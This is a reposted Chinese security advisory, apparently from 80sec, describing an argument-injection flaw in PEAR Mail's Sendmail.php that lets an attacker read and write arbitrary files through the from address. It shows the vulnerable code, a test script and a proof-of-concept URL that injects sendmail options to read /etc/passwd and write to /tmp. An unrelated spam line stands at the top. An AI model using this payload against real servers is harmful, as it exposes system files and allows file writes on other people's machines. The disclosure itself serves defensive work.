自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

所有PEAR的Mail函數(shù)包含任意文件讀寫漏洞

作者:80sec
安全 漏洞
$from 變量的過濾并不完全,由于escapeShellCmd會將\等字符替換為空,即可繞過對空格的檢查,而escapeshellcmd本身并不檢查對于參數(shù)的調用,所以導致安全漏洞的發(fā)生。

出現(xiàn)問題的地方位于Sendmail.php

......
if (!isset($from)) {
return PEAR::raiseError('No from address given.');
} elseif (strpos($from, ' ') !== false ||
strpos($from, ';') !== false ||
strpos($from, '&') !== false ||
strpos($from, '`') !== false) {
return PEAR::raiseError('From address specified with dangerous characters.');
}

$from = escapeShellCmd($from);
$mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? ' ' . $this->sendmail_args : '') . " -f$from -- $recipients", 'w');
if (!$mail) {
return PEAR::raiseError('Failed to open sendmail [' . $this->sendmail_path . '] for execution.’);
}
……

可以看到$from 變量的過濾并不完全,由于escapeShellCmd會將\等字符替換為空,即可繞過對空格的檢查,而escapeshellcmd本身并不檢查對于參數(shù)的調用,所以導致安全漏洞的發(fā)生。

漏洞測試:


<?php
ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . “\r\n”;
$to = “xxxxxxx@zzzz.com”;
$subj = “subscription request”;
$body = “subscribe me”;
$hdrs = array(
“To” => $to,
“Cc” => $cc,
“Bcc” => $bcc,
“From” => $from,
“Subject” => $subject,
);
$body=”test”;
$mail =& Mail::factory(’sendmail’);
$mail->send($to, $hdrs, $body);
?>

http://www.80sec.com/index.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

即可看到此漏洞的利用。

漏洞影響:所有PEAR的Mail函數(shù)包
漏洞狀態(tài):通知官方

責任編輯:王文文 來源: 80sec.com
PEARMail函數(shù)php漏洞
相關推薦

2013-10-31 13:19:06

2011-12-26 10:17:12

2020-10-12 09:46:34

漏洞

2019-01-02 09:16:27

2011-04-13 17:28:21

2009-12-09 09:49:40

2024-10-31 09:42:08

2011-12-13 11:08:00

2009-07-06 17:47:44

2015-04-02 16:26:39

漏洞檢測工具Kadimus

2009-12-08 17:01:01

PHP PEAR DB

2018-05-31 09:22:26

2009-12-09 15:23:36

PHP mail()函

2023-09-18 23:28:44

2013-11-26 09:45:36

2017-10-12 06:42:16

Tomcat代碼漏洞

2017-07-17 13:30:31

2025-02-21 08:10:00

漏洞網絡安全網絡攻擊

2021-01-15 09:36:23

漏洞shellweb安全

2021-11-08 07:26:36

Vailyn漏洞安全工具
點贊
收藏

51CTO技術棧公眾號